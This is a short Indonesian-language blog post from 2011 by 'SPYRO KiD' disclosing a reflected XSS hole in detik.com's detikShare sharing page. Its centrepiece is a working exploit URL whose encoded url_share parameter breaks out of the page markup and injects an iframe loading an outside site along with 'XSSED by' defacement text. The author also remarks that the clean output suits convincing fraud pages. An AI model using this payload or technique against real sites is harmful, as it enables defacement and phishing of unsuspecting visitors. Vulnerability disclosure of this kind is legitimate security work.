1 Lagi Celah XSS Pada Detik.COM


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Saturday, January 15th, 2011
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Detik.com hingga kini ternyata menyimpan banyak celah XSS. Setelah ramai dibicarakan di beberapa media elektronik dan forum tentang adanya celah pada Detik TV dan Comment, semalam saya menemukan satu celah lagi di detikShare.

Berbeda dengan beberapa celah sebelumnya yang menampilkan pesan Error, celah kali ini memberikan output cukup bersih sehingga halaman yang diexploitasi bisa ditata sesuka hati agar tampil lebih meyakinkan untuk aksi penipuan oleh pihak yang tidak bertanggung jawab.

Exploit

//Menampilkan spyrozone.net Melalui detikShare

http://post.detik.com/share/u.php?url_share=%22%3E%3C/a%3E%3C/iframe%3EXSSED%20by%20%3Ca%20href=http://www.spyrozone.net%3ESPYRO%20KiD%3C/a%3E%3Ccenter%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3Cnoscript%3E

Screenshot:

{image: detikShare XSSED by SPYRO KiD}

detikShare XSSED by SPYRO KiD


//E.O.F